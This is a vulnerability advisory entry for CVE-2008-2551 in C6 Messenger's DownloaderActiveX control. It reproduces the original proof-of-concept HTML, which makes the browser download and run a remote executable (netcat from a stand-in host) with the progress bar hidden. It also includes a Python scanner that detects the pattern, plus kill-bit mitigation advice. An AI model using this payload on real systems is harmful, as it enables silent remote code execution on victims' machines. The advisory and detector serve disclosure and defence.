Icona SpA C6 Messenger Installation URL Downloader ActiveX Control Input Validation Vulnerability

Vulnerability ID: 1115347
Vulnerability type: Permissions, privileges and access control
Published: 2008-06-03
Updated: 2009-01-29
CVE: CVE-2008-2551
CNNVD-ID: CNNVD-200806-086
Platform: Windows
CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/5732
https://cxsecurity.com/issue/WLB-2008060087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-086
|Vulnerability details
The DownloaderActiveX control (DownloaderActiveX.ocx) in Icona SpA C6 Messenger 1.0.0.1 allows a remote attacker to force the download and execution of an arbitrary file via a URL in the propDownloadUrl parameter; the propPostDownloadAction parameter must be set to "run".
|Exploit (PoC)
<!--

C6 Messenger Installation Url DownloaderActiveX Control Remote Download
& Execute Exploit

by
Nine:Situations:Group::SnoopyAssault

site: http://retrogod.altervista.org/

"C6 Messenger is an instant messaging program produced by Telecom Italia Group,
specifically by Alice (distribution), Icon Spa (development, design and server)
and Opendoc (graphics). It is the only instant messenger entirely produced in
Italy, is a free program, allows you to chat in real time with friends[..]"

installation urls:
http://c6.community.alice.it/home/index.html
http://c6.community.alice.it/download/c6.html

Whoever accessed the second one with IE to install the C6 IM is vulnerable to this
threat. Notice that you can also pass local URLs to the "propDownloadUrl" property
and bypass the Internet zone; no host check is performed.
The "propPostDownloadAction" one is used to launch the executable.
A progress bar is shown, but you can easily make it not visible.

settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data

info:
http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61&meta=&num=100&filter=0
Let me guess, this one is already exploited in the wild...
Thanks Mommy Telecom Italia!!

If you think this poc is useful, please help us to improve our equipment and
donate through the paypal button on our site!

--------------------------------------------------------------------------------
Goodbye rgod-tsid-pah he-ru-ka!
-->
<HTML>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground"  VALUE="#bccee8">
<PARAM NAME="propTextBackground"  VALUE="#f7f8fc">
<PARAM NAME="propBarColor"  VALUE="#df0203">
<PARAM NAME="propTextColor"  VALUE="#000000">
<PARAM NAME="propWidth"  VALUE="0">
<PARAM NAME="propHeight"  VALUE="0">
<PARAM NAME="propDownloadUrl"  VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) -->
<PARAM NAME="propPostDownloadAction"  VALUE="run"> <!-- lol -->
<PARAM NAME="propInstallCompleteUrl"  VALUE="">
<PARAM NAME="propBrowserRedirectUrl"  VALUE="">
<PARAM NAME="propVerbose"  VALUE="0">
<PARAM NAME="propInterrupt"  VALUE="0">
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2008-06-03]
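As an added defensive example (not part of the advisory or the original PoC), the following Python scanner flags HTML that instantiates this control's CLSID with propDownloadUrl set and propPostDownloadAction="run", the exact condition the details above describe; the sample pages and the example.invalid URLs in it are constructed.

```python
from html.parser import HTMLParser

# CLSID of the C6 Messenger DownloaderActiveX control, taken from the advisory above.
C6_DOWNLOADER_CLSID = "c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"


class _ObjectParamParser(HTMLParser):
    """Collect each <OBJECT> with the <PARAM> name/value pairs nested inside it."""
    def __init__(self):
        super().__init__()
        self.objects = []      # list of (classid, {param_name_lower: value})
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases tag and attr names
        if tag == "object":
            self._current = (a.get("classid", "").lower(), {})
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[1][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def find_c6_download_execute(html):
    """One finding per C6 downloader OBJECT whose propPostDownloadAction is "run"."""
    parser = _ObjectParamParser()
    parser.feed(html)
    findings = []
    for classid, params in parser.objects:
        if C6_DOWNLOADER_CLSID not in classid:
            continue
        url = params.get("propdownloadurl", "")
        action = params.get("proppostdownloadaction", "").strip().lower()
        if url and action == "run":
            # The advisory says local URLs are accepted too; record whether this one is remote.
            remote = url.lower().startswith(("http://", "https://"))
            findings.append({"classid": classid, "url": url, "remote": remote})
    return findings


# Constructed sample pages (not the original PoC): the exploit pattern, and a benign one.
MALICIOUS_PAGE = """<OBJECT ID="d" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61">
<PARAM NAME="propDownloadUrl" VALUE="http://example.invalid/payload.exe">
<PARAM NAME="propPostDownloadAction" VALUE="run"></OBJECT>"""
BENIGN_PAGE = """<OBJECT CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61">
<PARAM NAME="propDownloadUrl" VALUE="http://example.invalid/c6setup.exe">
<PARAM NAME="propPostDownloadAction" VALUE="none"></OBJECT>"""
```

Content scanning of this kind complements the durable mitigation, setting the ActiveX kill bit (Compatibility Flags 0x400) for this CLSID so that IE no longer instantiates the control at all.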
|References

Source: XF
Name: iconaspa-downloaderactivex-code-execution(42825)
Link: http://xforce.iss.net/xforce/xfdb/42825
Source: BID
Name: 29519
Link: http://www.securityfocus.com/bid/29519
Source: BUGTRAQ
Name: 20080603 [NSG03-06-2008] C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/493019/100/0/threaded
Source: MILW0RM
Name: 5732
Link: http://www.milw0rm.com/exploits/5732
Source: VUPEN
Name: ADV-2008-1733
Link: http://www.frsirt.com/english/advisories/2008/1733/references
Source: SREASON
Name: 3926
Link: http://securityreason.com/securityalert/3926
Source: SECUNIA
Name: 30512
Link: http://secunia.com/advisories/30512